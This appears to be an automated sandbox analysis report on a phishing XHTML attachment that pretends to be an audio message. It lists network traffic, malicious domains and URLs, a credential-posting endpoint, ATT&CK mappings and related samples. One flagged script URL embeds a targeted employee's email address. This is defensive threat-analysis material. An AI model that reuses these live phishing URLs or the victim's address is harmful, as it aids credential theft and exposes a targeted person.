Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8248._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: avcbtech.site

Source: unknown

HTTP traffic detected: POST /kuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveContent-Length: 58sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chromecache_70.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_72.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_72.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.88.193:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.4:49813 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir4084_861744479

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir4084_861744479

Jump to behavior

Source: classification engine

Classification label: mal88.phis.winXHTML@22/23@22/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,1541385170387388932,2389478623955166807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1944 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Pharma.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,1541385170387388932,2389478623955166807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1944 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#Ud83d#Udd0aAudio_Msg Pharma.xhtml	0%	Virustotal		Browse

Source	Detection	Scanner	Label
https://avcbtech.site/kuk/xwps.php	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	0%	Avira URL Cloud	safe
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.2.137	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	high
www.google.com	142.251.40.164	true	false	high
api.ipify.org	172.67.74.152	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	199.232.88.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8248._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/0HdPsKK.png	false		high
https://avcbtech.site/kuk/xwps.php	true	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false		high
https://i.imgur.com/KAb5SEy.png	false		high
file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Pharma.xhtml	true	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_72.2.dr	false		high
https://getbootstrap.com)	chromecache_72.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
199.232.88.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false
142.251.40.164	www.google.com	United States	15169	GOOGLEUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1650460
Start date and time:	2025-03-27 18:28:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Ud83d#Udd0aAudio_Msg Pharma.xhtml renamed because original name is a hash value
Original Sample Name:	Audio_Msg Pharma.xhtml
Detection:	MAL
Classification:	mal88.phis.winXHTML@22/23@22/10
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.64.110, 142.251.40.163, 142.250.31.84, 142.250.72.110, 142.250.65.234, 23.203.176.221, 142.251.40.99, 23.9.183.29, 13.107.246.40, 52.149.20.212
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	1208_37832604.doc	Get hash	malicious	Hancitor	Browse	api.ipify.org/
	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	ue8Q3DCbNG.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	LauncherV9.exe	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
199.232.88.193	https://u.to/JmY0Ig	Get hash	malicious	Unknown	Browse
199.232.88.193	Securefadv_DUE_INVOICE_&_SOA.html	Get hash	malicious	HTMLPhisher	Browse
